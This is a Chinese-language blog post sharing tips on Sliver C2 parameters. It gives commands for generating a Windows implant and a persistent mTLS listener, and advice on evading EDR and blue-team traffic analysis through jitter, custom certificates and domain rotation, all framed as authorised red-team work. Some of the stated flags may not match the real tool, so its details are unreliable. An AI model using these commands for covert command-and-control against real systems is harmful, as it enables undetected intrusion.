SliverC2参数深度解析:我踩过的那些坑与心得,句句扎心!
嘿,各位网安圈的老铁们,今天咱们不聊那些虚头巴脑的理论,直接来点硬核的!我最近在折腾SliverC2参数的时候,那真是“一把辛酸泪”啊!说实话,这玩意儿如果不把参数吃透,你连它的门都摸不着,更别说用它来搞(合法的)渗透测试了,憋了一肚子话,今儿非得跟你们好好唠唠,全是干货,不带一点水分!
初识Sliver,差点被参数劝退?
兄弟们,说真的,我第一次打开Sliver的Help文档时,脑子是“嗡”的一下。SliverC2参数那叫一个多啊!什么generate、mtls、http、dns,还有一堆看着就头大的--os、--arch、--save……我当时心里就一个念头:这玩意儿是给人用的吗?但咱是那种轻言放弃的人吗?显然不是!咬着牙,我硬是啃了三天文档,才总算理清了点脉络。
关键点来了:你知道generate命令里那个--mtls和--http参数是干嘛的吗?说白了,这就是你C2通信的“高速公路”啊!你要是只生成一个默认的HTTPS监听器,那跟裸奔没啥区别,分分钟被蓝队盯上,我当时就吃了这亏,生成个木马还没跑起来,就被客户(授权的啊!)的EDR给拦了,那叫一个尴尬……后来我学乖了,SliverC2参数里,generate --mtls YourDomain.com:8888,把通信端口和域名绑定,再配合上--skip-symbols这种减轻体积的参数,效果立马就不一样了,至少在流量层面不会那么扎眼。
SliverC2参数里的“心机”玩法:配置监听器
咱们接着唠,要说这SliverC2参数里最讲究的,还得是mtls监听器的配置,你们别笑,我身边真有哥们儿直接默认一把梭,结果管理端口全开着,那扫描器一扫一个准儿,我自己折腾下来,发现几个参数组合简直是“王炸”:
mtls --lhost 0.0.0.0 --lport 443 --persistent:哎,你们注意这个--persistent,这玩意儿太重要了!不加上它,你服务一重启,监听器就没了,那可真就是“一夜回到解放前”了。--cert证书参数:这个我得多说一句,你想让流量看起来更“合法”,一定得用自己的证书,别用自签的,用generate --mtls生成的证书,搭配上mtls --cert /path/to/cert.pem --key /path/to/key.pem,这样才能在流量检测设备眼里显得“人畜无害”,我试过,在Wireshark里看,自定义证书的流量特征明显比自签的要小得多。
别傻了!SliverC2参数里这几点不注意,你等于白干!
来来来,觉得上面还挺顺的?那我要开始泼冷水了。SliverC2参数里最让我抓狂的,不是那些大功能,而是各种“小脾气”。
比如那个--jitter参数(抖动时间),我当时为了图快,设置成0,结果通信频率稳如老狗,直接被蓝队的流量分析模型给识别出来了,后来我改成--jitter 3,随机延迟3秒,这下好多了,流量看起来才像是“人”在操作,而不是机器在定时打卡,你们说,这算不算细节决定成败?
还有,那个--daemon参数,我真服了!第一次用的时候,我傻乎乎地在本地终端直接运行,结果就是前台卡住了,啥也干不了,后来才明白,这玩意儿得配合--daemon扔到后台去跑,日志输出才能不干扰你的操作界面,你们要是用这个参数,千万记得重定向输出,不然日志刷屏能把你眼睛看花!
我的实战心得:SliverC2参数得这么配才顺手!
好了,吐槽归吐槽,但咱们最终还是得解决问题,我总结了一套我自己用着贼舒服的SliverC2参数配置组合,你们可以参考参考,但别照抄作业啊,得根据自己实战场景调整。
场景: 外网打点后,需要建立一条稳定的隐蔽隧道。
我的配置:
- 生成阶段:
generate --mtls --os windows --arch amd64 --save /root/agent.exe --skip-symbols --debug- 注意这个
--debug,能帮你本地先跑起来看看有没有报错,不然你扔到外网才发现问题那真是欲哭无泪。
- 注意这个
- 监听阶段:
mtls --lhost 0.0.0.0 --lport 8443 --persistent --jitter 5 - 会话交互: 拿到Session后,多用
info命令看看会话详情,尤其是Transport那一栏,确认是不是走MTLS,别到时候用的是HTTP,那加密性就大打折扣了。
我跟你们说,SliverC2参数就像一个杠杆,用好了能撬动整个内网,用不好就是砸自己脚,我上次在公司授权的红队项目里,就是靠这套组合拳,维持了整整两周的权限,期间换了三次C2域名,全靠参数里的--domains快速切换,愣是没让防守方发现真实IP,哈哈,那感觉,倍儿爽!
别再乱试了!这些SliverC2参数坑,我替你们踩平了
我得跟各位新手朋友说句掏心窝子的话,网上的教程大多是抄来抄去,能像我这样把SliverC2参数掰开揉碎讲的不多,很多参数组合看似合理,实则暗藏杀机。
比如说--proxy参数,你以为配个上游代理就万事大吉了?如果代理那边不支持TCP,或者代理本身指纹明显,那你的C2流量照样白给,我建议你们多去看看官方Wiki,或者直接反编译看看源码,那才是真正的“圣经”。没有万能的参数,只有适合场景的组合!
好啦,今天的唠嗑就到这里,关于SliverC2参数,我还有很多细节没来得及展开,比如armory扩展的配置,website服务的参数调优等等,如果你们在折腾过程中遇到啥奇葩问题,欢迎来跟我交流。

学习网络安全可以加QQ:3845678910(备注:来自博客),咱们下回再接着侃!记得,动手实践才是王道,参数是死的,人是活的!加油,兄弟们!

